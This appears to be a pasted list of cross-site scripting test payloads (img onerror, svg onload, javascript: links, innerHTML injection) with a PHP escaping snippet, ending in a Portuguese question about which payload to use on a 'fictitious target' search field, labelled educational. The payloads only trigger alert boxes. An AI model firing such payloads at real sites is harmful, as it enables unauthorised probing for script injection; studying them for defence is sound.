document.body.innerHTML = "<img src="x" onerror="alert(document.domain)">"

<img src="x" onerror="alert(String.fromCharCode(88,83,83))">


<svg/onload=setTimeout('javascript:alert(1)',0)>


<body onload=alert('XSS')>

<iframe src="javascript:alert('XSS')"></iframe>


<a href="javascript:alert('XSS')">Click me</a>

<?php
if (isset($_GET['name'])) {
    $name = $_GET['name'];
    $sanitized_name = htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
    echo "Hello, " . $sanitized_name;

    // Teste de bypassing com encoding alternativo
    // <img src="x" onerror="alert(String.fromCharCode(88,83,83))">
}
?>
<h1 class="heroSearch__content--word"><img src="x" onerror="alert('XSS')"></h1>

<input type="text" name="query" value="<img src='x' onerror='alert(&quot;XSS&quot;)'">

document.querySelector('.heroSearch__content--word').innerHTML = '<img src="x" onerror="alert(\'XSS\')">';


no meu alvo ficticio esta um Search files content..
qual destes codigos mencionado uso... Payload EDUCACIONAL.

